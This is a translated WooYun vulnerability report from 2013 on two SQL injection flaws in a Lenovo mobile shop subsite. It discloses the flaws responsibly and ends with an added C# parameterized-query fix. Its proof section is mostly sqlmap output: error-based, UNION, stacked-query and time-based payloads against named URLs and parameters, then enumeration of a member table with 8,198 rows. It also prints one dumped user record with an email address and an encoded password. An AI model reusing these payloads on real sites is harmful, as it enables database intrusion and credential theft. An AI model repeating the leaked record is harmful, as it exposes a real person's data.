
Vulnerability summary

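Bug ID: wooyun-2013-035084

Title: Lenovo security issue #3: two SQL injections on a subsite (8198 users' plaintext passwords at risk)

Vendor: Lenovo

Author: VIP

Submitted: 2013-08-23 16:00

Fixed: 2013-10-07 16:01

Publicly disclosed: 2013-10-07 16:01

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]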



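Vulnerability details

Disclosure status:

2013-08-23: Details sent to the vendor; awaiting vendor action
2013-08-23: Vendor has confirmed; details visible to the vendor only
2013-09-02: Details disclosed to core white hats and experts in related fields
2013-09-12: Details disclosed to regular white hats
2013-09-22: Details disclosed to trainee white hats
2013-10-07: Details disclosed to the public

Brief description:

Bored, so I just tagged along with 小胖子 and wandered around~~~

Detailed description:

First injection: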

http://ess.lenovomobile.com/regiStep2.aspx?MbrID=8199


Second injection (requires a logged-in session):

http://ess.lenovomobile.com/shopDtl.aspx?GdsID=A0900001586

Proof of vulnerability:

First injection:

---
Place: GET
Parameter: MbrID
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: MbrID=8199 AND 5966=CONVERT(INT,(SELECT CHAR(113)+CHAR(109)+CHAR(103)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5966=5966) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(102)+CHAR(114)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: MbrID=-3869 UNION ALL SELECT CHAR(113)+CHAR(109)+CHAR(103)+CHAR(98)+CHAR(113)+CHAR(81)+CHAR(98)+CHAR(79)+CHAR(84)+CHAR(85)+CHAR(98)+CHAR(89)+CHAR(67)+CHAR(98)+CHAR(114)+CHAR(113)+CHAR(117)+CHAR(102)+CHAR(114)+CHAR(113)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: MbrID=8199; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: MbrID=8199 WAITFOR DELAY '0:0:5'--
---
[13:32:34] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


Second injection:

---
Place: GET
Parameter: GdsID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: GdsID=A0900001586') AND 3859=3859 AND ('Twim'='Twim
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: GdsID=A0900001586') AND 3193=CONVERT(INT,(SELECT CHAR(113)+CHAR(116)+CHAR(100)+CHAR(101)+CHAR(113)+(SELECT (CASE WHEN (3193=3193) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(104)+CHAR(117)+CHAR(105)+CHAR(113))) AND ('MLFY'='MLFY
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: GdsID=A0900001586'); WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: GdsID=A0900001586') WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


Current database




Database: lmshop
[89 tables]


What columns the user table has

Database: lmshop
Table: EssMember
[12 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| Email | varchar |
| IsValid | nvarchar |
| MbrID | bigint |
| MbrName | varchar |
| Password | nvarchar |
| Phone | nvarchar |
| RegDate | datetime |
| RegID | nvarchar |
| SalesCode | varchar |
| SalesID | bigint |
| UpdDate | datetime |
| UpdID | nvarchar |
+-----------+----------+


Let's see how many rows there are

Database: lmshop
+---------------+---------+
| Table | Entries |
+---------------+---------+
| dbo.EssMember | 8198 |
+---------------+---------+


Then I dumped one user record, and the password turned out to be base64, seriously!!! How is that any different from plaintext!!!

[13:53:00] [INFO] retrieved: lihe@cmbchina.com
[13:53:00] [INFO] retrieved:
[13:53:01] [INFO] retrieved:
[13:53:01] [INFO] retrieved:
[13:53:02] [INFO] retrieved: 1
[13:53:02] [INFO] retrieved: lihe
[13:53:02] [INFO] retrieved: 05 20 2009 11:27AM
[13:53:03] [INFO] retrieved: 1
[13:53:03] [INFO] retrieved: 05 20 2009 11:27AM
[13:53:04] [INFO] retrieved: FE24W1UJNg1QedCl+4dKFw==

Suggested fix:

Filtering and the like

Copyright notice: when reposting, please credit the source VIP@WooYun (乌云)
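
Added example, not part of the original report and not the vendor's code: for the two injectable parameters above, filtering alone is fragile, and the durable fix is to validate the type and bind the value as a SQL parameter. The class and method names, the goods-ID pattern, and the `EssGoods` query with its `GdsID` column are assumptions; `EssMember` and its columns come from the report.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

// Hypothetical data-access helper for regiStep2.aspx and shopDtl.aspx.
public static class ShopQueries
{
    // Assumed goods-ID shape, modelled on the value in the report (A0900001586).
    private static readonly Regex GoodsId = new Regex(@"\A[A-Za-z0-9]{1,20}\z");

    // MbrID is a numeric context: parse to long first, then bind as BigInt.
    public static DataTable GetMember(string connStr, string rawMbrId)
    {
        long mbrId;
        if (!long.TryParse(rawMbrId, out mbrId) || mbrId <= 0)
            throw new ArgumentException("MbrID must be a positive integer");

        using (SqlConnection conn = new SqlConnection(connStr))
        using (SqlCommand cmd = new SqlCommand(
            "SELECT MbrID, MbrName, Email FROM dbo.EssMember WHERE MbrID = @MbrID", conn))
        {
            cmd.Parameters.Add("@MbrID", SqlDbType.BigInt).Value = mbrId;
            return Fill(cmd);
        }
    }

    // GdsID is a string context inside ('...'): the bound value can never close the quote.
    public static DataTable GetGoods(string connStr, string rawGdsId)
    {
        if (rawGdsId == null || !GoodsId.IsMatch(rawGdsId))
            throw new ArgumentException("GdsID has an unexpected format");

        using (SqlConnection conn = new SqlConnection(connStr))
        using (SqlCommand cmd = new SqlCommand(
            "SELECT * FROM dbo.EssGoods WHERE (GdsID = @GdsID)", conn)) // assumed table/column
        {
            cmd.Parameters.Add("@GdsID", SqlDbType.VarChar, 20).Value = rawGdsId;
            return Fill(cmd);
        }
    }

    private static DataTable Fill(SqlCommand cmd)
    {
        DataTable table = new DataTable();
        using (SqlDataAdapter adapter = new SqlDataAdapter(cmd))
            adapter.Fill(table); // Fill opens and closes the connection itself
        return table;
    }
}
```

With bound parameters, the stacked-query and `WAITFOR DELAY` payloads shown in the proof are rejected by validation or compared as literal data instead of being executed.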


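Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2013-08-23 16:30

Vendor reply:

Thanks to VIP for the contribution to Lenovo's security! We will immediately assess and fix the related vulnerabilities

Latest status:

None yet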